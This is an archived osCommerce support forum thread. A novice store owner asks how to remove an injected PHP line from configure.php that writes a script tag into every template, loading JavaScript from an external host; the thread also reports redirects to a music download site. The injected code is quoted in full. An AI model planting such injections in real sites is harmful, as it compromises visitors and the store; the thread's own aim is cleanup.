Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Browser Hijacks -- Help Please!!


SuzieQ

Recommended Posts

I am not a PHP programmer, so I am a novice at osCommerce setup. I inherited the store on my job and am having what appears to be a browser hijack problem. It seems to be twofold and I am grateful for any guidance in this forum.

 

1) It often takes many minutes for the store main page to resolve and the more activity we have in the store, the longer it seems to take. I discovered that the system is going out to an "EXTERNAL SITE" that has nothing to do with my site. I need to remove all occurrences of the code that calls the external site's script. The code (without quotes) follows:

 

"<? if(!defined("inserted")) {define("inserted",1); echo "<script language='JavaScript' type='text/javascript' src='http://www.EXTERNAL-SITE.net/stat.php'></script>";}?>"

 

and, subsequently, the following line (without quotes) is dynamically placed at the top of all my store templates:

 

"<script language='JavaScript' type='text/javascript' src='http://www.EXTERNAL-SITE.net/stat.php'></script>"

 

I found the above code in my configure.php file and have removed it there, but it is also being written from another place and still being inserted into my templates.

 

 

2) The main page of my store is sometimes redirected to a music download site (I won't mention the name). Is this related to the above code problem?? If not, how can I "fix" this redirect problem.

 

 

Please advise me on this(these) matter(s)! Thanks in advance for all you help!!

Link to comment
Share on other sites

I am not a PHP programmer, so I am a novice at osCommerce setup. I inherited the store on my job and am having what appears to be a browser hijack problem. It seems to be twofold and I am grateful for any guidance in this forum.

 

1) It often takes many minutes for the store main page to resolve and the more activity we have in the store, the longer it seems to take. I discovered that the system is going out to an "EXTERNAL SITE" that has nothing to do with my site. I need to remove all occurrences of the code that calls the external site's script. The code (without quotes) follows:

 

"<? if(!defined("inserted")) {define("inserted",1); echo "<script language='JavaScript' type='text/javascript' src='http://www.EXTERNAL-SITE.net/stat.php'></script>";}?>"

 

and, subsequently, the following line (without quotes) is dynamically placed at the top of all my store templates:

 

"<script language='JavaScript' type='text/javascript' src='http://www.EXTERNAL-SITE.net/stat.php'></script>"

 

I found the above code in my configure.php file and have removed it there, but it is also being written from another place and still being inserted into my templates.

2) The main page of my store is sometimes redirected to a music download site (I won't mention the name). Is this related to the above code problem?? If not, how can I "fix" this redirect problem.

Please advise me on this(these) matter(s)! Thanks in advance for all you help!!

 

Did you also edit the configure.php file in the admin area? I'm a novice too so that's all I got. But if it was in the first congif file, should be in the one in admin too.

 

Brandi

Link to comment
Share on other sites

Did you also edit the configure.php file in the admin area? I'm a novice too so that's all I got. But if it was in the first congif file, should be in the one in admin too.

 

Brandi

 

 

Hello,

 

No, I hadn't made that change. I have now and still waiting to see how it resolves.

Link to comment
Share on other sites

Hello,

 

No, I hadn't made that change. I have now and still waiting to see how it resolves.

 

 

I removed the code from both configure.php files and the script errors out to:

 

 

Warning: main(STS_START_CAPTURE): failed to open stream: No such file or directory in /home/ncpanet/public_html/store/includes/application_top.php on line 543

 

Warning: main(STS_START_CAPTURE): failed to open stream: No such file or directory in /home/ncpanet/public_html/store/includes/application_top.php on line 543

 

Fatal error: main(): Failed opening required 'STS_START_CAPTURE' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/ncpanet/public_html/store/includes/application_top.php on line 543

Link to comment
Share on other sites

Hi Dan,

 

I'm really a novice here. Where am I allowed to change my password?? I can't seem to find it in store admin. Thanks!

 

 

Hi There! I changed the password for the directory, so it's all set now. Thanks again!

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...